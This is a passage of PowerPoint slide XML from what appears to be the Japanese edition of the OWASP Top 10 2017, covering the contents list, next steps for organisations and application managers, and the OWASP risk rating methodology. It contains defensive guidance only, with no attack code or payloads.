                        <a:t>- 2017</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71758">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インジェクション</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認証の不備</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機微な情報の露出</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XML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外部エンティティ参照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XXE)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アクセス制御の不備</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不適切なセキュリティ設定</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クロスサイトスクリプティング</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(XSS)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安全でないデシリアライゼーション</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2946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既知の脆弱性のあるコンポーネントの使用</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不十分なロギングとモニタリング</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開発者のための次のステップ</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セキュリティテスト担当者のための</a:t>
                      </a:r>
                      <a:b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次のステップ</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組織のための次のステップ</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アプリケーションマネージャのための</a:t>
                      </a:r>
                      <a:endPar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次のステップ</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リスクに関する注記</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リスクファクターに関する詳細</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方法論とデータ</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謝辞</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1638219173"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939598"/>
          <a:ext cx="6858000" cy="896640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603625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>今すぐ、アプリケーションセキュリティ計画を開始しましょう</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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362776">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ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションセキュリティの実装は必須になっています。増加する攻撃と規制の圧力の間で、アプリケーションと</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を保護するための効果的なプロセスや能力を組織において確立する必要があります。すでに開発した膨大な数のアプリケーションと</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の長大な行数のコードがあり、多くの組織では膨大な量の脆弱性に対処することに奮闘しています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>はアプリケーションと</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>におけるセキュリティを改良するためにアプリケーションセキュリティのプログラムを組織において確立することを推奨しています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションセキュリティを実現するには、セキュリティと監査、ソフトウェア開発、ビジネス及びエグゼクティブマネジメントを含む、組織のさまざまな部門が効率的に連携する必要があります。各部門において組織におけるアプリケーションセキュリティの実態を把握できるよう、セキュリティの見える化を図り、計測可能な状態にすべきです。リスクを排除または低減することにより企業のセキュリティを向上させるような活動や成果に集中しましょう。以下のリストに示す活動のほとんどは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP SAMM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>と</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Guide for CISOs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に掲載されています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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1"/>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a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>組織のための次のステップ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="3209540"/>
          <a:ext cx="8686800" cy="660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id="{D3F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40133" y="8879889"/>
            <a:ext cx="1215135" cy="385875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>管理可視化の提供</a:t>
            </a:r>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p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3049505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4175971967"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="899077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548">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションライフサイクル全体を管理する</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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52">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ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションは、人が定期的に作成し、維持する最も複雑なシステムです。アプリケーションにおける</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>マネジメントは、アプリケーションの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ライフサイクル全体の責任を有する</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>スペシャリストにより実施されるべきです。アプリケーションオーナーと技術的に同等な立場の者としてアプリケーションマネージャを確立することをお勧めします。アプリケーションマネージャは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の観点から、要件策定からシステムの廃棄に至るまでのアプリケーションライフサイクル全体を担当します。</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-AU" sz="1050" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アプリケーションマネージャのための</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>次のステップ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1425931521"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2207695"/>
          <a:ext cx="6858000" cy="75083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817657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754083134"/>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556">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>弱点として表れるリスクについて</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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44">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のリスク格付手法は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に基づいています。我々は各</a:t>
                      </a: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のカテゴリに対して、典型的な</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>アプリケーションのそれぞれの弱点について、一般的な発生可能性と影響要素をみて、リスクを推計しました。そしてアプリケーションに対してもっとも重大なリスクをもたらすような弱点に基づいて</a:t>
                      </a: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を整理しました。これらの要素は、物事が変化し進化するにつれて、新しい</a:t>
                      </a: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がリリースされる度に更新されます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>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en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>は脆弱性のリスクを計算するために、多数の要素を定義しています。ただし、実際のアプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>における特定の脆弱性よりも、</a:t>
                      </a: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は一般論を議論すべきです。従って、我々は、リスク計算においてアプリケーションオーナーまたは管理者より、精緻になることはありません。アプリケーションとデータの重要性、脅威の内容、システムの構築方法や運用などに合わせ、ご自身で判断する必要があります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>我々が使用している手法は、弱点の発生可能性に関する三つの要素（蔓延度、検出のしやすさ、悪用のしやすさ）と一つの影響要素（技術面への影響）を含めています。各要素のリスクの尺度は、各要素に特有の用語を用いて、低</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>から高</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(3)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>までの範囲です。弱点の「蔓延度」は計算する時に、必ずしも含む必要はありません。「蔓延度」データについて、いくつもの組織（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>25</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ページの謝辞参照）から統計資料の提供を受け、それらの「蔓延度」に関するデータをまとめ上げ、「蔓延度」による</a:t>
                      </a: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の存在可能性リストを作成しました。このデータは、他の二つの発生可能性に関する要素（検出のしやすさ、悪用のしやすさ）と合わせて、各弱点の発生可能性の格付を計算しました。そしてその発生可能性の評価において、各弱点ごとに我々が推計した「技術面への影響」の平均値から、</a:t>
                      </a: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各項目のリスク順位の全体像を生成しました。（高いほど高リスク）。検出のしやすさ、悪用のしやすさ、影響は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>のそれぞれのカテゴリーに関連して報告された</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CVE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を分析して計算しました。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>注意</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>このアプローチが「脅威エージェント」の可能性を考慮していないことに注意してください。また、特定のアプリケーションの技術的な詳細も考慮していません。攻撃者が特定の脆弱性を突く際に、これらの要素が全体の発生可能性に大幅な影響を与える可能性があります。この評価はあなたのビジネスへの実際の影響も考慮していません。あなたの組織の文化、業界、規制などを考慮して、どのぐらいのセキュリティリスクをアプリケーションと</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
